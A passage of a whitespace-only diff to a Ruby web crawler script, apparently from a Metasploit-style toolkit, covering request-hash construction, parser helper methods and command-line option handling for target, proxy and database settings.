+			if (uri.host.nil? or uri.host.empty?) 
+				uritargethost = self.ctarget
+				uritargetssl = self.cssl
 			end
 			
 			uritargetport = uri.port
-			if (uri.port.nil?) 
-				uritargetport = self.cport
+			if (uri.port.nil?) 
+				uritargetport = self.cport
 			end
 
 			uritargetpath = uri.path
-			if (uri.path.nil? or uri.path.empty?) 
-				uritargetpath = "/"
+			if (uri.path.nil? or uri.path.empty?) 
+				uritargetpath = "/"
 			end
 
 			newp = Pathname.new(uritargetpath)
@@ -419,17 +419,17 @@ class HttpCrawler
 						newp = File.join(oldp.dirname,newp)
 					end
 				end		
-			end		
-		
-			hashreq = {
-				'rhost'		=> uritargethost,
-				'rport'		=> uritargetport,
-				'uri' 		=> newp.to_s,
-				'method'   	=> m,
-				'ctype'		=> 'text/plain',
-				'ssl'		=> uritargetssl,
-				'query'		=> uri.query,
-				'data'		=> nil
+			end		
+		
+			hashreq = {
+				'rhost'		=> uritargethost,
+				'rport'		=> uritargetport,
+				'uri' 		=> newp.to_s,
+				'method'   	=> m,
+				'ctype'		=> 'text/plain',
+				'ssl'		=> uritargetssl,
+				'query'		=> uri.query,
+				'data'		=> nil
 			}
 
 			if m == 'GET' and !dat.nil?
@@ -438,9 +438,9 @@ class HttpCrawler
 				hashreq['data'] = dat	  
 			end
 			
-			
-		
-			return hashreq
+			
+		
+			return hashreq
 	end
 	
 	# Taken from http://www.ruby-forum.com/topic/140101 by  Rob Biedenharn
@@ -458,128 +458,128 @@ class HttpCrawler
    		u.to_s
 	end
 
-	
-	
-	def hashsig(hashreq)
-		hashreq.to_s
-	end
-
-end	
-
-class BaseParser
-	attr_accessor :crawler
- 
-	def initialize(c)
-		self.crawler = c
-	end 
-
-	def parse(request,result)
-		nil
-	end
-	
-	#
-	# Add new path (uri) to test hash queue
-	#
-	def insertnewpath(hashreq)
-		self.crawler.insertnewpath(hashreq)
-	end
-	
-	def hashsig(hashreq)
-		self.crawler.hashsig(hashreq)
+	
+	
+	def hashsig(hashreq)
+		hashreq.to_s
+	end
+
+end	
+
+class BaseParser
+	attr_accessor :crawler
+ 
+	def initialize(c)
+		self.crawler = c
+	end 
+
+	def parse(request,result)
+		nil
+	end
+	
+	#
+	# Add new path (uri) to test hash queue
+	#
+	def insertnewpath(hashreq)
+		self.crawler.insertnewpath(hashreq)
+	end
+	
+	def hashsig(hashreq)
+		self.crawler.hashsig(hashreq)
 	end
 
 	def urltohash(m,url,basepath,dat)
 		self.crawler.urltohash(m,url,basepath,dat)	
-	end
-	
-	def targetssl
-		self.crawler.cssl
-	end
-	
-	def targetport
-		self.crawler.cport
-	end
-	
-	def targethost
-		self.crawler.ctarget
-	end
-	
-	def targetinipath
-		self.crawler.cinipath
-	end
-end
-
-
-trap("INT") { 
-	exit()
-}
-
-$args = Rex::Parser::Arguments.new(
-			"-t" => [ true,  "Target URI" ],
-			"-d" => [ false, "Enable database" ],
-			"-u" => [ true, "Use proxy"],
-			"-x" => [ true, "Proxy host" ],
-			"-p" => [ true, "Proxy port" ],
-			"-h" => [ false, "Display this help information"],
-			"-v" => [ false, "Verbose" ]
-		)
-	
-if ARGV.length < 1 
-	puts("\n" + "    Usage: #{$0} <options>\n" + $args.usage)
-	exit
-end		
- 
-turl = nil											   						                       
-$args.parse(ARGV) { |opt, idx, val|
-        case opt
-		when "-d"
-			$dbs = true
- 		when "-t"
-			$crun = true
-			turl = val
-		when "-u"
-			$useproxy = true
-		when "-v"
-			$verbose = true		
-		when "-x"
-			$proxyhost = val
-		when "-p"
-			$proxyposrt = val										
-        when "-h"
-			puts("\n" + "    Usage: #{$0} <options>\n" + $args.usage)
-			exit
-        end
-}		
-
-if $crun
-	uri = URI.parse(turl)
-	tssl = (uri.scheme == "https") ? true : false
-			
-	if (uri.host.nil? or uri.host.empty?) 
-		puts "Error: target http(s)://target/path"
-		exit
-	end
-	
-	if $useproxy
-		puts "Using proxy: #{$proxyhost}:#{$proxyport}" 
-	end
-	
-	mc = HttpCrawler.new(uri.host,uri.port,uri.path,tssl,$proxyhost, $proxyport, $useproxy)
-	if $dbs
-		puts "Database: #{$dbpathmsf}"
-	else
-		puts "[DATABASE DISABLED]"
+	end
+	
+	def targetssl
+		self.crawler.cssl
+	end
+	
+	def targetport
+		self.crawler.cport
+	end
+	
+	def targethost
+		self.crawler.ctarget
+	end
+	
+	def targetinipath
+		self.crawler.cinipath
+	end
+end
+
+
+trap("INT") { 
+	exit()
+}
+
+$args = Rex::Parser::Arguments.new(
+			"-t" => [ true,  "Target URI" ],
+			"-d" => [ false, "Enable database" ],
+			"-u" => [ true, "Use proxy"],
+			"-x" => [ true, "Proxy host" ],
+			"-p" => [ true, "Proxy port" ],
+			"-h" => [ false, "Display this help information"],
+			"-v" => [ false, "Verbose" ]
+		)
+	
+if ARGV.length < 1 
+	puts("\n" + "    Usage: #{$0} <options>\n" + $args.usage)
+	exit
+end		
+ 
+turl = nil											   						                       
+$args.parse(ARGV) { |opt, idx, val|
+        case opt
+		when "-d"
+			$dbs = true
+ 		when "-t"
+			$crun = true
+			turl = val
+		when "-u"
+			$useproxy = true
+		when "-v"
+			$verbose = true		
+		when "-x"
+			$proxyhost = val
+		when "-p"
+			$proxyposrt = val										
+        when "-h"
+			puts("\n" + "    Usage: #{$0} <options>\n" + $args.usage)
+			exit
+        end
+}		
+
+if $crun
+	uri = URI.parse(turl)
+	tssl = (uri.scheme == "https") ? true : false
+			
+	if (uri.host.nil? or uri.host.empty?) 
+		puts "Error: target http(s)://target/path"
+		exit
+	end
+	
+	if $useproxy
+		puts "Using proxy: #{$proxyhost}:#{$proxyport}" 
+	end
+	
+	mc = HttpCrawler.new(uri.host,uri.port,uri.path,tssl,$proxyhost, $proxyport, $useproxy)
+	if $dbs
+		puts "Database: #{$dbpathmsf}"
+	else
+		puts "[DATABASE DISABLED]"
 	end
 
 	if $enableul
 		puts "URI LIMITS ENABLED: #{$maxurilimit}"
 	end
-
-	puts "Target: #{mc.ctarget} Port: #{mc.cport} Path: #{mc.cinipath} SSL: #{mc.cssl}"
-	mc.run	
-end
-
-
-		
-		
-	
+
+	puts "Target: #{mc.ctarget} Port: #{mc.cport} Path: #{mc.cinipath} SSL: #{mc.cssl}"
+	mc.run	
+end
+
+
+		
+		
+